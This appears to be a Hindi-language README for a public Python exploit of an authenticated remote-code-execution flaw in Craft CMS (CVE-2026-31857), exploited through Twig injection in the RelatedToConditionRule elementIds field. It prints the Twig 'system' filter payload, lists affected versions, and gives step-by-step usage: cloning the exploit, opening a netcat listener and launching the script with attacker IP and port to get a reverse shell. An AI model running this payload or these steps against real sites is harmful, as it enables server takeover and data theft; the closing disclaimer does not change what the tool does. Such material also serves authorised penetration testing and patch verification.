
Craft CMS में कंट्रोल पैनल में रिलेशनल कंडीशनल्स के माध्यम से RCE
Craft CMS एडमिन पैनल में एक RCE कमज़ोरी के लिए Python एक्सप्लॉइट, जो admin/actions/element-indexes/count-elements एंडपॉइंट के माध्यम से ट्रिगर होती है।
यह इंजेक्शन RelatedToConditionRule कंडीशन के elementIds फ़ील्ड के ज़रिए होता है, जिसे सर्वर-साइड पर Twig के रूप में इंटरप्रेट किया जाता है और system फ़िल्टर के ज़रिए मनमाना कमांड चलाने के लिए दुरुपयोग किया जाता है ({{[['<cmd>']|filter('system')]}})।
कमज़ोरी का खुलासा NeoSprings द्वारा किया गया
प्रभावित संस्करण :
>= 5.0.0-RC1, <= 5.9.8>= 4.0.0-beta.1, <= 4.17.3संदर्भ :
$ git clone https://github.com/0xTatsuki/CVE-2026-31857.git
$ cd CVE-2026-31857
$ pip install -r requirements.txt
$ nc -lvnp <attacker_port>
$ python3 CVE-2026-31857.py -t http://<craftcms_base_url> -u <username> -p <password> -i <attacker_ip> -P <attacker_port>
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत अभ्यासों (CTF, अनुबंधित पेनिट्रेशन टेस्टिंग या स्थानीय परीक्षण) के लिए प्रदान किया गया है। स्पष्ट अनुमति के बिना किसी भी सिस्टम के विरुद्ध इसका उपयोग करना अवैध है।